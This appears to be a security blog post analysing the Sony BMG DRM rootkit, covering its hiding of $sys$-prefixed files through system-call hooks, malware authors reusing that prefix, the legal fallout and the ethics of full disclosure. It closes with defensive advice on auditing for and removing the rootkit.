Mark Russinovich discovered last week — and published a detailed analysis a few days later — that Sony BMG music CDs install a rootkit on Windows machines as part of their digital-rights-management (DRM) protection. The rootkit hides files and processes; modifies the kernel; provides no uninstaller; introduces exploitable vulnerabilities. Sony has been forced into a recall and faces multiple lawsuits.
This is not a typical incident-response post. The technical details matter; the structural and political implications matter more. The Sony rootkit incident is, on the available evidence, going to be a turning point in how the field thinks about the boundary between legitimate software and malware.
What the rootkit does
When a Sony BMG copy-protected CD is inserted into a Windows machine and the user accepts the EULA presented during AutoRun, the protection software installs:
A kernel-mode driver that hooks the Windows system-call table to hide files, processes, and registry keys whose names start with the prefix $sys$. Anything with that prefix is invisible to standard tools (Explorer, cmd.exe, regedit, ps).
An audio-CD-monitoring service that runs in the background, reports listening activity back to a Sony server, and enforces playback restrictions on the CD's tracks.
A DRM enforcement layer that prevents copying the CD's audio tracks, prevents extraction to MP3, and limits the number of times the user can transfer tracks to other devices.
No uninstaller. The software provides no documented mechanism to remove itself. Users who want to remove it must either reformat their machine, use third-party tools designed for malware removal, or obtain a removal tool from Sony — which Sony only made available after public pressure.
The combination is structurally indistinguishable from typical malware. Files are hidden; the user is not informed of the installation; removal is deliberately difficult; the software phones home without disclosing what it transmits.
The technical analysis
Russinovich's analysis is detailed and worth reading directly. The key technical observations:
The rootkit hooks the syscall table. Specifically, the system calls that enumerate files (NtQueryDirectoryFile), processes (NtQuerySystemInformation), and registry keys are intercepted. The interception filters out anything with the $sys$ prefix before returning to the caller. The technique is identical to what malicious rootkits use to hide their files and processes.
The hooks are buggy. Within days of the public disclosure, malware authors had begun using the rootkit's hiding capabilities for their own software. Files named with the $sys$ prefix — any files, not just Sony's — are hidden by the rootkit. Malware authors who know this can name their files with the prefix and become invisible to standard tools on any host with the Sony rootkit installed.
This is the structurally-significant detail. The Sony rootkit is not just itself malware-like; it actively creates exploitable hiding capabilities for other malware. The DRM measure has become an attack-amplification platform.
The kernel hooks introduce instability. The rootkit's kernel modifications produce occasional system crashes on some hosts. The crashes are intermittent enough that users have not necessarily attributed them to the rootkit; the cumulative reliability cost across the Sony customer base is substantial.
The phone-home is undisclosed. The audio-CD-monitoring service contacts Sony servers without informing the user. The data sent includes information about which tracks are being played and how often. This is undisclosed surveillance; the EULA does not mention it; the user has no way to opt out short of removing the software (which they cannot do).
The legal and political dimensions
The response across multiple jurisdictions has been substantial.
United States. The Federal Trade Commission and multiple state attorneys-general have opened investigations. Class-action lawsuits have been filed. Congress has held hearings. The Department of Homeland Security has issued a public advisory characterising the software as a security risk to government systems.
United Kingdom. Sophos and other UK-based security vendors have published technical advisories. The Information Commissioner's Office is reportedly examining the disclosure question.
European Union. The European Commission is examining whether the software constitutes a violation of consumer-protection law and whether it requires disclosure under various data-protection directives.
Japan. Sony's home country has been notably silent in the public response, though internal reporting suggests significant disagreement within the company about how to handle the situation.
The legal response is, in some real sense, the most important consequence of the incident. Whatever specific outcome each jurisdiction reaches, the cumulative effect will be to legally define what software vendors can and cannot do without explicit user consent. The boundary between legitimate software and malware is being drawn in court.
Why this matters beyond Sony
Three things make this incident structurally significant.
A major commercial entity has shipped software that is functionally indistinguishable from malware. Sony BMG is a Fortune 500 company. The software was distributed on CDs sold in retail stores worldwide. The boundary between "legitimate software" and "malware" is, in this case, organisational rather than technical. The same code, with the same behaviour, would be unambiguously labelled malware if it had been written by an underground author.
The implication: the technical definition of malware is insufficient. We need behavioural definitions — what the software does, regardless of who wrote it. This is the conversation that the Sony incident is starting.
The DRM-as-rootkit pattern is going to be reused. Sony is not the only entertainment company using aggressive DRM. Other music labels, movie studios, and software publishers have similar measures or are developing them. The Sony approach was particularly aggressive but the underlying pattern — DRM that requires kernel-level enforcement — is widespread.
The operational implication: Windows machines may be running multiple kernel-level DRM enforcement components, each with its own quirks, each providing potential attack surface. The cumulative effect is a substantial increase in the attack surface of typical Windows installations.
The trust model around commercial software is being re-examined. Until this incident, the implicit assumption was that commercial software from major vendors was trustworthy by default. Sony BMG has demonstrated that this assumption is naïve. Operators must now treat any software, regardless of vendor, with the same suspicion they would treat unknown software.
The practical consequence: operators should be examining what is actually running on their systems, what files exist, what network connections are being made. The traditional discipline of "trust the vendor" is no longer adequate.
The malware authors' response
The most operationally concerning development since the disclosure: malware authors have begun using the Sony rootkit's hiding capabilities. Within days of the public technical analysis, several malware variants were discovered that named their files with the $sys$ prefix. On any host with the Sony rootkit installed, those files become invisible to standard malware-detection tools.
The Sony rootkit is, in effect, a hiding service now available to any malware author who chooses to use it. The author writes their malware to use the prefix; the rootkit (already deployed by Sony's CDs) provides the hiding capability. The malware is invisible to operators who cannot first identify and remove the Sony rootkit.
This is the chain-compromise pattern at the structural level — Sony's software, intended for legitimate use, has become substrate for malicious use. The chain is uncomfortable because the substrate was deployed by a Fortune 500 company on retail CDs, not by an underground worm.
The defensive response requires:
- Identifying which hosts have the Sony rootkit installed.
- Removing the rootkit (which is non-trivial because the rootkit hides itself).
- Auditing for malware that may have been using the hiding capability.
- Restoring host integrity.
The cost of this cleanup is substantial. The cleanup requirement falls on the operators, not on Sony. Sony's response has been recall-focused, not cleanup-focused.
The Russinovich publication question
A brief reflection on the disclosure pattern. Russinovich is an independent researcher (and the founder of Sysinternals). He discovered the rootkit through routine investigation of an unrelated issue on a personal machine. He published the findings on his blog without first notifying Sony.
The disclosure was, by any reasonable measure, full disclosure rather than coordinated disclosure. Sony did not have an opportunity to ship a patch or recall before the public disclosure.
Is this the right approach? My initial instinct, based on the disclosure conventions I have written about, would have been coordinated disclosure. Sony notified privately; given a window to respond; public disclosure on a defined timeline.
The argument for full disclosure in this specific case: Sony was the vendor, not the victim. The traditional coordinated-disclosure model assumes the vendor is acting in good faith and will use the notification window to fix the issue. Sony was deliberately shipping the rootkit; there was no bug to fix; the problem was the vendor's intentional behaviour.
In this case, the asymmetry of information favoured Sony as long as the issue was private. Public disclosure was the mechanism that triggered the public response — recall, lawsuits, investigations. Coordinated disclosure would have allowed Sony to mitigate the situation privately while continuing to ship the same software on new CDs.
This is, on reflection, a category-of-disclosure that does not fit the traditional coordinated/full dichotomy. The question is not "how should responsible disclosure work between researcher and vendor?". It is "how should disclosure work when the vendor is the perpetrator?".
My current thinking: when the vendor is the entity creating the problem, full disclosure is justified because the vendor's interests are not aligned with the user's interests. Coordinated disclosure assumes shared interests; this case lacks them.
The field will be working through this question for some time. The Sony incident is the clearest example to date.
What this teaches
Four generalisations.
The malware definition is contested. What software is malicious depends on intent and context, not just behaviour. The technical features of malware (hiding, persistence, undisclosed phone-home) are now also features of legitimate-but-aggressive commercial software. Operators need to develop frameworks for evaluating software based on what it does, regardless of who shipped it.
Commercial software trust is conditional. The default assumption that vendor-shipped software is trustworthy is no longer defensible. Operators must verify, monitor, and audit even the software they have purchased through legitimate channels.
The legal and regulatory response is starting to be substantial. This is genuinely new. For most of the past decade, security incidents have produced legal responses bounded by criminal prosecution of individual attackers. The Sony incident is producing legal responses against a vendor for the design of their software. The legal precedent will, eventually, shape what vendors can ship.
The chain-compromise pattern extends to commercial software. Sony's rootkit is now substrate for malicious use. The pattern of one piece of software becoming substrate for subsequent attacks, which I have written about in the context of worms, now applies to commercial software. The defensive implications are larger.
What operators should do
For anyone managing Windows infrastructure:
Audit for the Sony rootkit. Tools to detect it have been published by multiple security vendors. The audit takes minutes per host; the findings are sometimes surprising (users may have inserted Sony BMG CDs without realising what was being installed).
Remove the rootkit if found. Sony has now published a removal tool, after substantial public pressure. The removal is non-trivial; specialist tools may produce cleaner results than Sony's official tool.
Audit for malware using the $sys$ prefix. Any files or processes with that prefix should be investigated. The Sony rootkit's hiding capability means standard tools may not see them; specialist anti-rootkit tools are needed.
Consider policy implications. Many organisations are now banning audio CDs from work computers, or banning AutoRun, or both. The cost-benefit has shifted. The convenience of allowing audio CDs is small; the risk is now demonstrated.
For operators considering DRM-protected content more generally:
Read the EULA carefully. Or rather: assume the EULA grants the vendor more rights than you would actively want to grant. The Sony EULA, on examination, did technically permit the rootkit installation. The disclosure was inadequate; the technical permission was, arguably, present.
Use playback environments that do not run vendor software. Audio CDs played on dedicated CD players, not on networked computers, eliminate the entire category of risk. The trade-off is convenience.
Watch for similar patterns from other vendors. The Sony pattern can be repeated. Other entertainment-industry vendors are developing similar protection schemes. The disclosure of subsequent ones may be more or less aggressive; the operational risk profile is similar.
What this changes for the field
Three things, on the medium-term horizon.
Anti-malware vendors are going to need to redefine their scope. Malware definitions traditionally exclude software shipped by major commercial vendors. The Sony incident makes that exclusion untenable. Anti-malware vendors will need to detect and remove software based on behaviour rather than on vendor identity.
This is a substantial cultural shift for the anti-malware industry. Detecting Sony's rootkit means publicly classifying a major media company's software as malware. The legal and commercial implications are non-trivial. The shift will, on the available evidence, happen anyway, because the alternative is to be obviously incomplete.
Operating-system vendors will face pressure to restrict kernel-level access. The Sony rootkit's ability to install kernel-mode code is a structural property of Windows. Microsoft has been signalling for years that this access will be tightened in future versions; the Sony incident accelerates the pressure. Future Windows versions are likely to have stronger restrictions on what can install kernel-mode code.
The trust model will adjust. Operators will become more sceptical of all commercial software. The default-trust assumption will be replaced by default-verify. The specific verification mechanisms — code signing with stronger guarantees, install-time auditing, runtime monitoring — will mature over the next several years.
A small reflection
This is one of the more substantively interesting incidents I have written about. Most incidents I cover are about specific vulnerabilities, specific worms, specific operational responses. The Sony incident is categorical — it is changing how the field thinks about what software vendors can do, what malware is, and what trust between operators and vendors means.
For my own writing: more posts about the trust-model question. The incident has highlighted how much of the security model rests on trust assumptions that have not been examined in some time.
For the field: this is going to be a multi-year conversation. The legal outcomes will take years to resolve. The cultural shift will take longer. The structural improvements will take longer still.
For my own infrastructure: I have always been cautious about what software I install. The Sony incident reinforces the discipline. I will continue to be more cautious than necessary; the cost is small; the benefit, when categorical incidents like this occur, is meaningful.
More as the situation develops.
A closing observation
Russinovich did the field a service by publishing the analysis. The publication has produced substantial change — legal action, recall, public attention, structural conversations. Without the publication, Sony's behaviour would presumably have continued; subsequent vendors would have shipped similar software with confidence; the structural problems would have remained invisible.
The field benefits from researchers who do this kind of work. The professional incentives, however, do not always reward it — Russinovich faced legal threats from Sony; the disclosure could have produced lawsuits against him; the personal cost was non-trivial.
For anyone reading this who is in a position to publish similar analyses: the field needs you. The cost is real; the value is also real; the cumulative effect of this kind of disclosure is what produces structural improvement.
For anyone who appreciates this kind of work: support the researchers who do it. Buy their books, attend their talks, contribute to their projects when invited. The infrastructure of public security research depends on a small population of researchers who can sustain the work over years; their sustainability depends on the rest of us.
More in time.